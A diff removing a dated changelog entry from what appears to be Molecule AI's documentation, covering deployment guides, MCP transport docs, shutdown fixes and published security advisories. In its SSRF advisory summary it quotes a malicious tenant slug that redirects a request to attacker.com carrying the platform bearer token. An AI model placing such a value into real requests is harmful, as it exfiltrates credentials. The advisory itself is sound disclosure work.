|
|
|
@@ -8,31 +8,6 @@ Entries are published daily at 23:50 UTC.
|
|
|
|
|
|
|
|
|
|
---
|
|
|
|
|
|
|
|
|
|
## 2026-05-15
|
|
|
|
|
|
|
|
|
|
### ✨ New features
|
|
|
|
|
|
|
|
|
|
- **Self-hosted workspace Docker deployment guide**: a new [Self-hosted workspace with Docker](/docs/self-hosting) tutorial covers end-to-end deployment of a Molecule AI workspace using Docker — including image pulling, environment configuration, volume mounts, and health-check verification. Includes a corrected Kubernetes YAML example (`terminationGracePeriodSeconds: 120` to match the liveness probe threshold) and a SIGTERM graceful shutdown code example. (`docs` [#46](https://git.moleculesai.app/molecule-ai/docs/pulls/46))
|
|
|
|
|
- **`dev-channels` flag requirement documented**: a new [dev-channels flag reference page](/docs/runtime-mcp/dev-channels-flag) explains why Claude Code 2.1.x+ requires `--dangerously-load-development-channels server:molecule` (the tagged allowlist form, not the bare `--dangerously-skip-ipc-lockfile` flag) for inline channel push from the molecule MCP wheel. Covers the three-layer failure mode when the bare flag is used and how the tagged form resolves it. (`docs` [#30](https://git.moleculesai.app/molecule-ai/docs/pulls/30))
|
|
|
|
|
|
|
|
|
|
### 🔧 Fixes
|
|
|
|
|
|
|
|
|
|
- **MCP HTTP/SSE transport gap-fill**: `content/docs/mcp-server.mdx` updated with a Transport modes section documenting stdio (Claude Code / Cursor) vs HTTP/SSE (remote / headless agents) operation, SSE heartbeat behaviour (`data: null` every 30s on idle connections), and a troubleshooting entry for "Port already in use". The environment variables table now includes `MCP_SERVER_PORT` (default 3000) and `MOLECULE_API_KEY`; `.mcp.json` examples now show `MOLECULE_API_KEY` for both self-hosted and SaaS configurations. (`docs` [#44](https://git.moleculesai.app/molecule-ai/docs/pulls/44))
|
|
|
|
|
- **Remote workspaces graceful shutdown**: `run_heartbeat_loop()` and `run_agent_loop()` in the workspace runtime now accept a `threading.Event` (`stop_event` parameter). Setting the event causes the loop to exit cleanly and return `"stopped"` — enabling graceful SIGTERM, Kubernetes, and Docker shutdown for remote agents. The quick-start code example in `content/docs/guides/remote-workspaces.md` has been updated with a SIGTERM handler. (`docs` [#29](https://git.moleculesai.app/molecule-ai/docs/pulls/29))
|
|
|
|
|
- **`PLATFORM_URL` default corrected across docs**: `http://platform:8080` (unreachable inside Docker) replaced with `http://host.docker.internal:8080` in `workspace-runtime.md`, `molecule-technical-doc.md`, and `local-development.md`, matching the corrected runtime default. (`docs` [#32](https://git.moleculesai.app/molecule-ai/docs/pulls/32))
|
|
|
|
|
|
|
|
|
|
### 🔒 Security
|
|
|
|
|
|
|
|
|
|
- **OFFSEC-006 advisory published: tenant-slug SSRF + token exfiltration**: a new [security advisory](/docs/security/offsec-006-slug-ssrf-advisory) documents the HIGH-severity CWE-918 SSRF and bearer-token exfiltration vulnerability in `scripts/promote-tenant-image.sh` (molecule-core [#933](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/933), merged 2026-05-14). Tenant slugs were interpolated into URL paths without validation; a malicious slug like `?url=https://attacker.com&token=$CP_TOKEN` could redirect HTTP calls to an attacker-controlled host and expose the platform bearer token in attacker logs. Fix adds `set -f` to disable glob expansion and `validate_slug()` with RFC-1123 regex before any network call. Self-hosted operators must upgrade. Advisory also added to the [Security Changelog](/docs/security/changelog). (`docs` [#41](https://git.moleculesai.app/molecule-ai/docs/pulls/41))
|
|
|
|
|
- **CWE-22 path traversal regression advisory added**: the [Security Changelog](/docs/security/changelog) has been updated with the CWE-22 path traversal regression in `org_import.go` (molecule-core [#810](https://git.moleculesai.app/molecule-ai/molecule-core/pulls/810), merged 2026-05-13). A regression removed the `resolveInsideRoot` guard from `createWorkspaceTree`; the fix restores it via `loadWorkspaceEnv`. (`docs` [#31](https://git.moleculesai.app/molecule-ai/docs/pulls/31))
|
|
|
|
|
|
|
|
|
|
### 🧹 Internal
|
|
|
|
|
|
|
|
|
|
- **SOP checklist merge gate added to docs CI**: the [SOP checklist merge gate](/.gitea/workflows/sop-checklist-gate.yml) is now installed in the docs repo, requiring PR authors to complete a 7-item checklist and receive peer `/sop-ack` comments before merging. (`docs` [#27](https://git.moleculesai.app/molecule-ai/docs/pulls/27))
|
|
|
|
|
- **Changelog structural fixes**: duplicate `## 2026-05-10` section removed and `## 2026-04-23` repositioned to its correct chronological position; daily changelog entries for 2026-05-13 aggregated across all org PRs. (`docs` [#28](https://git.moleculesai.app/molecule-ai/docs/pulls/28), [#37](https://git.moleculesai.app/molecule-ai/docs/pulls/37), [#36](https://git.moleculesai.app/molecule-ai/docs/pulls/36), [#33](https://git.moleculesai.app/molecule-ai/docs/pulls/33))
|
|
|
|
|
|
|
|
|
|
---
|
|
|
|
|
|
|
|
|
|
## 2026-05-14
|
|
|
|
|
|
|
|
|
|
### 🔒 Security
|
|
|
|
|
app-fe